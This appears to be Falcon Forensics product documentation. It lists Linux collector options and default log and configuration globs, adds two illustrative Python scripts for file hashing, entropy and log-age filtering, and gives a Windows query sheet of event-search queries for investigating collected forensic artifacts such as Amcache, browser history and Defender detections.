Maximum File Size for Hashing (Bytes) Integer Skip hashing for files larger than this size. Yes. Default: 100000000
Maximum items Integer Maximum number of items to process. Yes. Default: 200000
Skip Directory String Comma-separated directories to exclude from collection. Yes. Default: /sys,/dev,/proc
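
The Recursion Depth, Skip Directory, Maximum items and Maximum File Size options of the FileSystem and Entropy collectors are easy to misread, so here is an added example (not CrowdStrike's code) that emulates them on a constructed temporary directory tree and computes per-file SHA256 and Shannon entropy the way the EntropyScan event describes; file names, sizes and thresholds are all made up for the demo.

```python
"""Added example, not CrowdStrike's own code: a small emulation of the
FileSystem and Entropy collector options described above (recursion depth,
skipped directories, maximum items, maximum file size for hashing) that also
computes Shannon entropy per file. All paths and sizes are constructed."""
import hashlib
import math
import os
import tempfile
from collections import Counter
from typing import Iterable, Iterator


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant byte stream, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def walk_with_depth(root: str, recursion_depth: int, skip_dirs: Iterable[str]) -> Iterator[str]:
    """Yield file paths under root using the collector's depth semantics:
    0 = top level only, 1 = one level of sub-directories, and so on.
    Directories in skip_dirs are pruned before os.walk descends into them."""
    root = os.path.abspath(root)
    skip = {os.path.abspath(p) for p in skip_dirs}
    for dirpath, dirnames, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        depth = 0 if rel == "." else rel.count(os.sep) + 1
        # Editing dirnames in place controls where os.walk goes next.
        dirnames[:] = [
            d for d in dirnames
            if depth < recursion_depth and os.path.join(dirpath, d) not in skip
        ]
        for name in sorted(filenames):
            yield os.path.join(dirpath, name)


def collect(root: str, recursion_depth: int = 100,
            skip_dirs: Iterable[str] = ("/sys", "/dev", "/proc"),
            max_items: int = 200000, max_hash_size: int = 100000000) -> list[dict]:
    """Build FileInfo-style records; the defaults mirror the FileSystem collector's
    default configuration. Files above max_hash_size are listed but not hashed."""
    records: list[dict] = []
    for path in walk_with_depth(root, recursion_depth, skip_dirs):
        if len(records) >= max_items:
            break
        try:
            size = os.path.getsize(path)
        except OSError:
            continue  # vanished or unreadable between listing and stat
        rec = {"TargetFileName": path, "Size": size, "SHA256HashData": None, "Entropy": None}
        if size <= max_hash_size:
            with open(path, "rb") as fh:
                data = fh.read()
            rec["SHA256HashData"] = hashlib.sha256(data).hexdigest()
            rec["Entropy"] = round(shannon_entropy(data), 3)
        records.append(rec)
    return records


def names(records: list[dict]) -> list[str]:
    """Sorted base names of the collected records (handy for checks)."""
    return sorted(os.path.basename(r["TargetFileName"]) for r in records)


def build_sample_tree() -> str:
    """Constructed sample data: a temporary tree three levels deep."""
    base = tempfile.mkdtemp(prefix="ffc_demo_")
    os.makedirs(os.path.join(base, "level1", "level2"))
    os.makedirs(os.path.join(base, "skipme"))
    files = {
        "top.txt": b"A" * 1024,                                    # constant bytes: entropy 0.0
        "big.bin": b"\x00" * 2000,                                 # over the demo hash limit
        os.path.join("level1", "mid.bin"): bytes(range(256)) * 4,  # every byte value equally: 8.0
        os.path.join("level1", "level2", "deep.txt"): b"deep",
        os.path.join("skipme", "ignored.txt"): b"x",
    }
    for rel, content in files.items():
        with open(os.path.join(base, rel), "wb") as fh:
            fh.write(content)
    return base


if __name__ == "__main__":
    base = build_sample_tree()
    for rec in collect(base, recursion_depth=1,
                       skip_dirs=[os.path.join(base, "skipme")], max_hash_size=1500):
        print(rec)
```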

FirewallRules

Collects firewall rules information.

Events generated

FirewallRuleInfo: Contains information about firewall rules created on the host.

IP Addresses

Collects IP4/6 addresses on the machine.

Events generated

LocalIpAddressIP4: Describes an IPv4 Address on the machine.

LocalIpAddressIP6: Describes an IPv6 Address on the machine.

IP Connections

Collects NetworkReceiveAccept, NetworkConnect, NetworkListen, and NetworkClose events for both IPv4 and IPv6.

Events generated

IPv4:

  • NetworkListenIP4: IPv4 Network listen event.
  • NetworkReceiveAcceptIP4: IPv4 network SYN event.
  • NetworkConnectIP4: IPv4 network connect event.
  • NetworkCloseIP4: IPv4 network close event.

IPv6:

  • NetworkListenIP6: IPv6 Network listen event.
  • NetworkReceiveAcceptIP6: IPv6 network SYN event.
  • NetworkConnectIP6: IPv6 network connect event.
  • NetworkCloseIP6: IPv6 network close event.

IP Routes

Collects IP4/6 route information.

Events generated

RouteIP4: IPv4 route entry.

RouteIP6: IPv6 Route entry.

Kernel Modules

Collects information on kernel modules that have been loaded into memory.

Events generated

KernelModeLoadImage: Indicates a kernel-mode module has been loaded into memory.

Kernel Params

Collects kernel parameter information.

Events generated

KernelParameter: A value in the operating system kernel.

Line

Collects information contained in various log files and reconstructs logs line by line.

Events generated

FileEntry: Some portion of a text file, either a single line or matched regular expression.

Configurable options
Option Type Description In default configuration?
Glob pattern String Specify a glob pattern to match and limit collected data. No
Log file type Multiple selection Specifies the type of log file to process. No
Default configuration examples

Shell history files

Name Glob pattern Log file type
shell-history-home /home/*/*_history FILE_SHELL_HISTORY
shell-history-root /root/*_history FILE_SHELL_HISTORY

SSH configuration files

Name Glob pattern Log file type
ssh-config /home/*/.ssh/config FILE_SSH_CONFIG
authorized-keys /home/*/.ssh/authorized_keys FILE_AUTHORIZED_KEYS
authorized-keys-root /root/*/authorized_keys FILE_AUTHORIZED_KEYS
known-hosts /home/*/*/known_hosts FILE_KNOWN_HOSTS
known-hosts-root /root/*/known_hosts FILE_KNOWN_HOSTS

Scheduled tasks

Name Glob pattern Log file type
/etc/cron /etc/cron* FILE_SCHEDULED
cron-spool /var/spool/cron/**/* FILE_SCHEDULED
cron-directories /etc/cron*/** FILE_SCHEDULED
at /etc/at* FILE_SCHEDULED

System configuration files

Name Glob pattern Log file type
systemd /etc/systemd/*/* FILE_SYSTEM_CONFIG
rc /etc/rc FILE_SYSTEM_CONFIG
root-rc /root/rc FILE_SYSTEM_CONFIG
sub-root-rc /root/*/rc FILE_SYSTEM_CONFIG
rc.d /etc/rc*.d/* FILE_SYSTEM_CONFIG
sysctl /etc/sysctl.d/* FILE_SYSTEM_CONFIG
etc-hosts /etc/*hosts FILE_SYSTEM_CONFIG
etc-conf /etc/*conf FILE_SYSTEM_CONFIG

System startup files

Name Glob pattern Log file type
init /etc/init*/* FILE_SYSTEM_START
systemv-inittab /etc/inittab* FILE_SYSTEM_START

User configuration files

Name Glob pattern Log file type
user-rc /home/*/*rc FILE_SHELL_CONFIG
user-profile /home/*/*profile FILE_SHELL_CONFIG
etc-profile /etc/profile FILE_SYSTEM_CONFIG

System authentication files

Name Glob pattern Log file type
lib-security /usr/lib*/security*/* FILE_SYSTEM_AUTH
pam.d /etc/pam.d*/* FILE_SYSTEM_AUTH
etc-security /etc/security*/* FILE_SYSTEM_AUTH
log-secure /var/log/secure* FILE_SYSTEM_AUTH
sudoers /etc/sudoers FILE_SYSTEM_AUTH

Processes

Collects information on currently running processes at time of collection.

Events generated

ProcessRollup2: Running process observed at collection time.

ProcessOpenedFileDescriptor: Indicates that a process has opened a file, socket, or library.

FileDescriptorMonitor: Indicates that a file descriptor is being monitored.

SystemLog

Collects information from various log files.

Events generated

LogEntry: A log entry observed on an endpoint.

Configurable options
Option Type Description In default configuration?
Path String Specify a directory path. Yes. Default: /var/log/system.log* (see Default configuration examples)
Maximum items Integer Maximum number of entries to collect. Yes. Default: various (see Default configuration examples)
Maximum Age String Maximum age of log entries to collect (valid units: ns, us or µs, ms, s, m, h, d). Yes. Default: 100d

Default configuration examples

Authentication logs

Name Path Maximum items
syslog-sudo /var/log/sudo* 10000
syslog-su /var/log/su 10000
syslog-auth /var/log/auth* 10000
syslog-secure /var/log/secure* 10000
syslog-ssh /var/log/ssh* 10000

System logs

Name Path Maximum items
syslog-crit /var/log/crit* 10000
syslog-messages /var/log/messages* 10000
syslog-system /var/log/system* 10000
syslog-syslog /var/log/syslog* 10000
syslog-daemon /var/log/daemon* 10000
syslog-cron /var/log/cron* 10000

Kernel and boot logs

Name Path Maximum items
kernel-log /var/log/kern* 5000
dmesg-log /var/log/dmesg* 5000
boot-log /var/log/boot* 5000

Application logs

Name Path Maximum items
falcon-log /var/log/falcon* 5000
nginx-logs /var/log/nginx/* 10000
samba-logs /var/log/samba/* 10000
apache-logs /var/log/apache*/* 10000
www-logs /var/log/www/* 10000
php-logs /var/log/php* 10000
httpd-logs /var/log/httpd/* 10000
tomcat-logs /var/log/tomcat*/* 10000
fail2ban-logs /var/log/fail2ban* 10000
squid-logs /var/log/squid/* 10000

Users

Collects information on user and group accounts on a system.

Events generated

UserIdentity: Information about an observed user account.

GroupIdentity: Information about a user group: its name and GID, and the names, UIDs, and SIDs of its member users.

UserAccountDeleted: Information about a deleted user account.

Configurable options
Option Type Description In default configuration?
Sources Multiple selection Select user information sources to collect. Sources include: files, ldap, systemd. Yes. Default: files

UTmpLog

Collects information on user terminal login and logout events.

Events generated

LogEntry: A log entry observed on an endpoint.

Configurable options
Option Type Description In default configuration?
Path String Specify a directory path. Yes. Default: various (see Default configuration examples)
Maximum items Integer Maximum number of entries to collect. Yes. Default: 10000
Maximum age String Maximum age of log entries to collect (valid units: ns, us or µs, ms, s, m, h, d). Yes. Default: 100d

Default configuration examples

Login records

Name Path
wtmp /var/log/wtmp*
btmp /var/log/btmp*
lastlog /var/log/lastlog
run-utmp /run/utmp
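
The Audit, SystemLog and UTmpLog collectors all take the same "Maximum age" duration string (units ns, us or µs, ms, s, m, h, d) and a "Maximum items" cap. The following added example (not CrowdStrike's code) parses that duration format, rejects anything outside the documented units, and applies both limits to a constructed set of login-record entries; the entries and the fixed "now" are made up for the demo.

```python
"""Added example, not CrowdStrike's own code: parse the "Maximum age"
duration strings the log collectors above accept (units ns, us or µs, ms, s,
m, h, d) and apply that window together with a "Maximum items" cap to
constructed log entries, newest first."""
import re
from datetime import datetime, timedelta, timezone

# Nanoseconds per unit, covering exactly the units the collector documents.
UNIT_NS = {"ns": 1, "us": 1_000, "µs": 1_000, "ms": 1_000_000,
           "s": 10**9, "m": 60 * 10**9, "h": 3600 * 10**9, "d": 86400 * 10**9}
DURATION_RE = re.compile(r"^\s*(\d+)\s*(ns|us|µs|ms|s|m|h|d)\s*$")


def parse_max_age(text: str) -> timedelta:
    """Turn '100d', '30m' or '250µs' into a timedelta; anything else is rejected.
    timedelta resolves to whole microseconds, so sub-microsecond values round."""
    match = DURATION_RE.match(text)
    if not match:
        raise ValueError(f"invalid duration {text!r}: expected <integer><unit>, e.g. '100d'")
    value, unit = match.groups()
    return timedelta(microseconds=int(value) * UNIT_NS[unit] / 1000)


def select_entries(entries: list[dict], now: datetime, max_age: str, max_items: int) -> list[dict]:
    """Keep entries no older than max_age relative to now, newest first,
    truncated to max_items, mirroring the collector's two limits."""
    window = parse_max_age(max_age)
    recent = [e for e in entries if now - e["timestamp"] <= window]
    recent.sort(key=lambda e: e["timestamp"], reverse=True)
    return recent[:max_items]


# Constructed sample data: five login-record style entries of increasing age.
NOW = datetime(2026, 3, 29, 12, 0, tzinfo=timezone.utc)
SAMPLE = [
    {"timestamp": NOW - timedelta(hours=1), "ForensicsText": "alice pts/0 login"},
    {"timestamp": NOW - timedelta(days=3), "ForensicsText": "bob pts/1 login"},
    {"timestamp": NOW - timedelta(days=50), "ForensicsText": "carol tty1 login"},
    {"timestamp": NOW - timedelta(days=150), "ForensicsText": "dave pts/2 login"},
    {"timestamp": NOW - timedelta(days=400), "ForensicsText": "erin tty2 login"},
]

if __name__ == "__main__":
    # With the documented default of 100d, only the three newest entries survive.
    for entry in select_entries(SAMPLE, NOW, "100d", 10000):
        print(entry["timestamp"].isoformat(), entry["ForensicsText"])
```
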

Volumes

Collects information on all mounted disks.

Events generated

FsVolumeMounted: Information about a volume that has been observed.

YARA

Runs YARA rules and collects the results. This collector is not in the default configuration.

Events generated

FfcBytePatternScanResult: Result of a YARA scan.

Configurable options

Option Type Description In default configuration?
Directory paths String Directory path(s) to scan. Can specify multiple paths separated by newlines. No
File paths String Specific file path(s) to scan. Can specify multiple paths separated by newlines. No
YARA text rules String Embed YARA rules directly within the config file No

Falcon Forensics Query Sheet for Windows

Example queries to be used in advanced event search to investigate ingested Forensics data in Windows.

Tips for searches

Improve the efficiency and effectiveness of your Falcon Forensics searches by using ForensicsCollectionIdentifier, AID, and certain techniques to limit the scope of data, leverage joins efficiently, and take advantage of grouping functions. You can also apply case-sensitivity options for more precise results.

When searching, it's recommended to use ForensicsCollectionIdentifier or AID to help reduce the search time. Falcon Forensics can create many events, which can take a long time to parse through. By using a Collection ID or AID, it can reduce this time. This recommendation doesn't apply if you're searching environment-wide, of course. If you're looking for a specific file, you should try using the FileInfo event.

Regarding FfcFileIdentifier: this value is only useful within a single collection, because it is built from the filesystem's UUID and the file's inode number, so the same file has different FfcFileIdentifier values on different machines. Use it to tie together events from one collection, since many events carry this field but not, for example, a SHA256 hash.

Joins can be resource-intensive, so the best approach is to limit the data first with ForensicsCollectionIdentifier or AID. You can join without these, but the search may take longer and may hit result limits. If you're searching for something common across your environment, any filtering criteria will do, but FfcFileIdentifier won't work as a key across hosts because it is unique to each system. You can use joins in any searches that share common fields.

In the searches on this page, you'll notice many groupBy statements, and these are some of the best ways to group values together. For example, if you're looking for a specific hash you would group by SHA256HashData while collecting other important fields. This groups all of the resultant data into a table.

These are examples of case sensitivity in searches.
  • HostName=Test only matches hosts named "Test"
  • HostName=/test/i matches test, Test, TeSt, or any similar combination

System

ForensicsCollectorOnline

Show All Fields for ForensicsCollectorOnline

#event_simpleName = ForensicsCollectorOnline ForensicsCollectionIdentifier = * FfcPlatform = FFC_PLATFORM_WINDOWS | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ComputerName, FfcPlatform, aid, cid, FfcCollectionId, FfcCollectionTag, FfcExecutableName, FfcExecutablePath, FfcVersion, PhysicalAddress, LocalAddressIP4, LocalAddressIP6, DomainName, UserIsAdmin, IsVirtualMachine], limit=max)

Note: This can be queried to see if a collection started on a Windows host.

ForensicsCollectorOffline

Show all fields for ForensicsCollectorOffline

#event_simpleName = ForensicsCollectorOffline ForensicsCollectionIdentifier = * FfcPlatform = FFC_PLATFORM_WINDOWS | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ComputerName, FfcPlatform, aid, cid, FfcCollectionId, FfcExecutableName, FfcExecutablePath], limit=max)
ForensicsCollectorLog

Show all fields for ForensicsCollector Log

#event_simpleName = ForensicsCollectorLog ForensicsCollectionIdentifier = * | "Log Text" := rename(FfcCollectorLogText) | Module := rename(FfcModule) | "Log Level" := rename(FfcLogLevel) | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, id, "Log Level", Module, "Log Text", #event_simpleName, name], limit=max)
OsVersionInfo

Show all fields for OsVersionInfo

#event_simpleName=OsVersionInfo ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| table([time, MajorVersion, MinorVersion, PlatformId, BuildNumber, ServicePackMajor, ServicePackMinor, SuiteMask, ProductType, BuildType, AgentVersion, ProductName, OSVersionFileName, OSVersionFileData, SystemTimeZone], limit=max)

Amcache

Show All Fields for AmCacheEntry

#event_simpleName=AmcacheEntry ForensicsCollectionIdentifier = *
| LastVolumeRegWrite := parseTimestamp(field="LastVolumeRegWrite", format=seconds)
| LastVolumeRegWrite := formatTime(format="%F %T", field="LastVolumeRegWrite")
| LastFileRegWrite := parseTimestamp(field="LastFileRegWrite", format=seconds)
| LastFileRegWrite := formatTime(format="%F %T", field="LastFileRegWrite")
| table([ContextTimeStamp, ForensicsCollectionIdentifier, aid, ProgramUUID, VolumeName, LastVolumeRegWrite, AmFileId, LastFileRegWrite, ProductName, CompanyName, AmFileVersionNumber, FileVersion, PeHashData, FileDescription, SHA1HashData, ModifyTime, CreateTime, ProductVersion, LanguageId, Size, ImageCheckSum, ImageCompilationDate, LinkerVersion, AmSwitchBackContext, AmIsLocal, AmGuessProgramId, TargetFileName, AppArchitecture], limit=max)

One or two character file names

#event_simpleName=AmcacheEntry ForensicsCollectionIdentifier = * | length(AmFileId) | _length <= 2 | groupBy([AmFileId], function=collect([TargetFileName,SHA1HashData]))

BAM

Show all fields for BamRegAppRunTime

#event_simpleName=BamRegAppRunTime ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, RegKeyName, AppName, FfcFileIdentifier, UserSecurityDomain, UserSid, UserName], limit=max)

Browser

Show all Fields for BrowserCookieInfo

#event_simpleName = BrowserCookieInfo ForensicsCollectionIdentifier = * | BrowserCookieLastAccessed := parseTimestamp(field="BrowserCookieLastAccessed", format=seconds) | BrowserCookieLastAccessed := formatTime(format="%F %T", field="BrowserCookieLastAccessed") | BrowserCookieExpiration := parseTimestamp(field="BrowserCookieExpiration", format=seconds) | BrowserCookieExpiration := formatTime(format="%F %T", field="BrowserCookieExpiration") | table([BrowserCookieLastAccessed, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserCookieHost, BrowserCookiePath, BrowserCookieExpiration, BrowserCookieIsHttpOnly, BrowserCookieIsSecure, SourceFileName, UserName], limit=max)

Show cookies from a specific site

#event_simpleName = BrowserCookieInfo ForensicsCollectionIdentifier = * | BrowserCookieLastAccessed := parseTimestamp(field="BrowserCookieLastAccessed", format=seconds) | BrowserCookieLastAccessed := formatTime(format="%F %T", field="BrowserCookieLastAccessed") | BrowserCookieExpiration := parseTimestamp(field="BrowserCookieExpiration", format=seconds) | BrowserCookieExpiration := formatTime(format="%F %T", field="BrowserCookieExpiration") | BrowserCookieHost = <site of interest> | table([BrowserCookieLastAccessed, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserCookieHost, BrowserCookiePath, BrowserCookieExpiration, BrowserCookieIsHttpOnly, BrowserCookieIsSecure, SourceFileName, UserName], limit=max)
Note: Replace <site of interest> with the site name. You can use wildcards such as "*google.com".

Show all Fields for BrowserExtensionInfo

#event_simpleName = BrowserExtensionInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserExtensionId, BrowserExtensionName, InstallDate, BrowserExtensionVersion, UpdateSupportUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Show BrowserExtensionInfo with Matching Browser

#event_simpleName = BrowserExtensionInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserExtensionId, BrowserExtensionName, InstallDate, BrowserExtensionVersion, UpdateSupportUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)
Note: Replace BROWSERNAME with browser name such as Edge, Firefox, Chrome.

Show all fields for BrowserHistoryVisit

#event_simpleName=BrowserHistoryVisit | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, UserName, BrowserName, BrowserArtifactType, Url, Title, BrowserVisitCount, BrowserUrlTypedCount, BrowserVisitType, Id, BrowserRedirectSourceTableEntry, BrowserRedirectDesitnationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastModifiedTimeStamp], limit=max)
Note: ContextTimeStamp (time) is collection time.

Show all fields for BrowserDownloadStarted

#event_simpleName=BrowserDownloadStarted | ContextTimeStamp := parseTimestamp(field="ContextTimeStamp", format=seconds) | time := formatTime(format="%F %T", field="ContextTimeStamp") | table([time, aid, ForensicsCollectionIdentifier, UserName, BrowserName, BrowserArtifactType, Url, Size, TargetFileName, SourceFileName, BrowserDownloadLastAccessed, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, MimeType, BrowserDownloadFileState, BrowserDownloadFileOpened, BrowserDownloadSiteUrl, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain], limit=max)

Show abnormally large files

#event_simpleName=BrowserDownloadStarted | ContextTimeStamp := parseTimestamp(field="ContextTimeStamp", format=seconds) | time := formatTime(format="%F %T", field="ContextTimeStamp") | Size > <fill in bytes here> | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, BrowserDownloadLastAccessed, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)
Note: Replace <fill in bytes here> with the size threshold, in bytes, you're looking for.

Show all fields for BrowserDownloadEnded

#event_simpleName=BrowserDownloadEnded | ContextTimeStamp := parseTimestamp(field="ContextTimeStamp", format=seconds) | time := formatTime(format="%F %T", field="ContextTimeStamp") | table([time, aid, ForensicsCollectionIdentifier, UserName, BrowserName, BrowserArtifactType, Url, Size, TargetFileName, SourceFileName, BrowserDownloadLastAccessed, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, MimeType, BrowserDownloadFileState, BrowserDownloadFileOpened, BrowserDownloadSiteUrl, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain], limit=max)

Show downloaded files from a specific site

#event_simpleName=BrowserDownloadEnded | ContextTimeStamp := parseTimestamp(field="ContextTimeStamp", format=seconds) | time := formatTime(format="%F %T", field="ContextTimeStamp") | BrowserDownloadSiteUrl = <site of interest> | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, BrowserDownloadLastAccessed, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)
Note: Replace <site of interest> with the site name. You can use wildcards such as "*google.com".

Show abnormally large files

#event_simpleName=BrowserDownloadEnded | ContextTimeStamp := parseTimestamp(field="ContextTimeStamp", format=seconds) | time := formatTime(format="%F %T", field="ContextTimeStamp") | Size > <fill in bytes here> | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, BrowserDownloadLastAccessed, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)
Note: Replace <fill in bytes here> with the size threshold, in bytes, you're looking for.

DataStore

Show all fields for OsUpdateTimestamp

#event_simpleName=OsUpdateTimestamp ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, UpdateGuid, UpdateClassificationGuid, UpdateServerGuid, UpdateClientId, UpdateServerSelection, UpdateStatus, Description, UpdateTitle, UpdateCategory, UpdateMoreInfoUrl, UpdateSupportUrl], limit=max)

Defender

Show all fields for MpThreat

#event_simpleName=MpThreat ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | MpThreatTrackingStartTime := parseTimeStamp(field=MpThreatTrackingStartTime, format=seconds) | MpThreatTrackingStartTime := formatTime("%F %T", field=MpThreatTrackingStartTime) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, MpThreatTrackingId, MpThreatTrackingStartTime, MpThreatTrackingSize, MpThreatTrackingSha1, MpThreatTrackingMD5, MpThreatTrackingSha256, MpThreatTrackingScanType, MpThreatTrackingScanFlags, MpThreatTrackingScanSource, MpThreatID, MpThreatName, MpThreatTrackingSigSeq, MpThreatTrackingSigSha, MpThreatTrackingIsEsuSig], limit=max)

Show all fields for MpThreatDetection

#event_simpleName=MpThreatDetection ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | MpInitialDetectionTime := parseTimeStamp(field=MpInitialDetectionTime, format=seconds) | MpInitialDetectionTime := formatTime("%F %T", field=MpInitialDetectionTime) | MpLastThreatStatusChangeTime := parseTimeStamp(field=MpLastThreatStatusChangeTime, format=seconds) | MpLastThreatStatusChangeTime := formatTime("%F %T", field=MpLastThreatStatusChangeTime) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, MpMagicVersion, MpResource, MpResourceType, MpCategoryID, MpDetectionID, MpDomainUser1, MpDomainUser2, MpInitialDetectionTime, MpLastThreatStatusChangeTime, MpSeverityID, MpThreatID, MpThreatName, MpThreatStatusID, MpThreatStatusErrorCode], limit=max)

Show all fields for MpThreatWMI

#event_simpleName=MpThreatWMI ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, TargetFileName, DidThreatExecute, IsActive, FfcFileIdentifier, MpCategoryID, MpThreatResources, MpThreatRollupStatus, SchemaVersion, MpSeverityID, MpThreatID, MpThreatName, MpThreatTypeID], limit=max)

Show all fields for MpThreatDetectionWMI

#event_simpleName=MpThreatDetectionWMI ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | MpLastThreatStatusChangeTime := parseTimeStamp(field=MpLastThreatStatusChangeTime, format=seconds) | MpLastThreatStatusChangeTime := formatTime("%F %T", field=MpLastThreatStatusChangeTime) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, ActionSuccess, AdditionalRemediationActionsBitMask, CurrentThreatExecutionStatusID, MpDetectionID, MpDetectionSourceTypeID, MpDomainUser1, MpInitialDetectionTime, MpLastThreatStatusChangeTime, MpRemediationTime, MpThreatCleaningActionID, MpThreatID, MpThreatResources, MpThreatStatusErrorCode, MpThreatStatusID, ProductVersion, TargetProcessName], limit=max)

Dirlist

Show All Fields for FileInfo

#event_simpleName=FileInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, FfcFileIdentifier, TargetFileName, Size, UserName, MD5HashData, SHA1HashData, SHA256HashData, FileHeader, FileAttributes, UserSecurityDomain, TargetFileExtension, CompanyName, ImageInternalName, FileOwnerSid, UserSid, FileDescription, FileVersion, FileLegalCopyRight, CertificateExists, OriginalFileName, ProductName, ProductVersion], limit=max)

Find hidden files

#event_simpleName=FileInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | FileAttributes=*FILE_ATTRIBUTE_HIDDEN* | table([time, ForensicsCollectionIdentifier, FfcFileIdentifier, FileName, TargetFileName, FileAttributes, SHA256HashData, UserName], limit=max)

Find less common extensions

#event_simpleName=FileInfo ForensicsCollectionIdentifier = * | NOT TargetFileName=*.jar NOT TargetFileName=*.sys NOT TargetFileName=*.zip NOT TargetFileName=*.exe NOT TargetFileName=*.dll NOT TargetFileName=*.ocx NOT TargetFileName=*.cpl | table([ForensicsCollectionIdentifier, FfcFileIdentifier, TargetFileName, UserName], limit=max)

A known threat actor tactic is to name DLL files with "d1l" instead of "dll"; this is a quick-win search for potentially malicious DLL files in the environment.

#event_simpleName=FileInfo ForensicsCollectionIdentifier = * | FileName= *.d1l OR FileName= *.dl1 | table([ForensicsCollectionIdentifier, FfcFileIdentifier, FileName, TargetFileName, UserName], limit=max)

Find file names shorter than 6 characters, checking for files that fly under the radar with the extensions bat, cmd, ps1, vbs, and vbe.

#event_simpleName=FileInfo ForensicsCollectionIdentifier = * | FileName=*.bat OR FileName=*.cmd OR FileName=*.ps1 OR FileName=*.vbs OR FileName=*.vbe | length(FileName) | _length < 6 | table([ForensicsCollectionIdentifier, FfcFileIdentifier, FileName, TargetFileName, UserName], limit=max)

Show All Fields for FileTimestampMetadata

#event_simpleName=FileTimestampMetadata ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TargetFileName, FfcFileChangeType, FileAttributes, FfcFileIdentifier], limit=max)

Show All Fields for SignInfo

